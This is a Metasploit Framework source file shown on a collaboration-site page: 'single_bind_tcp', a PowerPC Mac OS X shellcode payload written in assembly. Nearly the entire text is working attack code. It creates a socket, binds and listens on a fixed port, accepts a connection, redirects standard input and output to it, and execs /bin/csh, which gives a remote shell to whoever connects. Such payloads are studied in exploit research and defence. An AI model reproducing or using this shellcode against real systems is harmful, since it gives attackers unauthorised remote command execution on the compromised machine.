Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
;;
2
;
3
;        Name: single_bind_tcp
4
;   Qualities: Can Have Nulls
5
;   Platforms: MacOS X / PPC
6
;     Authors: H D Moore <hdm [at] metasploit.com>
7
;     Version: $Revision: 1612 $
8
;     License:
9
;
10
;        This file is part of the Metasploit Exploit Framework
11
;        and is subject to the same licenses and copyrights as
12
;        the rest of this package.
13
;
14
; Description:
15
;
16
;        Quick and dirty bind shell
17
;
18
;
19
;;
20

21

22
.globl _main
23
.globl _execsh
24
.text
25

26
_main:
27

28
_socket:
29
	li		r3, 2
30
	li		r4, 1
31
	li		r5, 6
32
	li		r0, 97
33
	sc
34
	xor		r0, r0, r0
35
	mr		r30, r3
36

37
	bl		_bind
38
	.long 0x00022312
39
	.long 0x00000000
40

41
_bind:	
42
	mflr	r4
43
	li		r5, 16
44
	li		r0, 104
45
	mr		r3, r30
46
	sc
47
	xor		r0, r0, r0
48

49
_listen:
50
	li		r0, 106
51
	mr		r3, r30
52
	sc
53
	xor     r0, r0, r0
54

55
_accept:
56
	mr		r3, r30
57
	li		r0, 30
58
	li		r4, 16
59
	stw		r4, -24(r1)
60
	subi	r5, r1, 24
61
	subi	r4, r1, 16
62
	sc
63
	xor		r0, r0, r0
64
	mr		r30, r3
65

66
_setup_dup2:
67
	li		r5, 2
68

69
_dup2:
70
	li		r0, 90
71
	mr		r3, r30
72
	mr		r4, r5
73
	sc
74
	xor		r0, r0, r0
75
	subi	r5, r5, 1
76
	cmpwi	r5, -1
77
	bnel	_dup2
78

79
_fork:
80
	li		r0, 2
81
	sc
82
	xor		r5, r5, r5
83

84
_execsh:
85
	;; based on ghandi's execve
86
	xor.	r5, r5, r5
87
	bnel	_execsh
88
	mflr	r3
89
	addi	r3, r3, 28	; distance to path
90
	stw		r3, -8(r1)	; argv[0] = path
91
	stw		r5, -4(r1)	; argv[1] = NULL
92
	subi	r4, r1, 8	; r4 = {path, 0}
93
	li		r0, 59
94
	sc					; execve(path, argv, NULL)
95
	
96
; csh removes the need for setuid()
97
path:
98
	.ascii	"/bin/csh"
99
	.long 	0x00414243
100

101